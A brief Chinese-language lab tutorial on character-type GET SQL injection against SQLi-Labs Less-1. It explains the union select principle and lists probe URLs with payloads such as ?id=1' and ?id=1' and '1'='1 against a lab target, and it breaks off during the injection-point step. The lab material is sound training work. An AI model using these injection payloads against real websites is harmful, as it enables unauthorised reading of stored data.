实验原理
字符型GET注入,其注入点存在于URL中的GET参数处;
攻击者可以通过构造恶意的GET输入参数,利用union select 命令进行注入,暴露数据库中存储的信息。
实验步骤
1 访问SQLI-Labs网站
http://(加靶机IP)/sqli-labs/Less-1/
登录后,根据网页提示,定一个GET参数
http://(靶机ip)/sqli - labs / Less/?id=1
2 寻找注入点
用以下三条payload寻找注入点及判断注入点的类型;
http://(靶机ip)/sqli-labs/Less-1/?id=1'
运行后报错
http://(靶机ip)/sqli-labs-master/Less-1/?id=1' and '1'='1运行后正常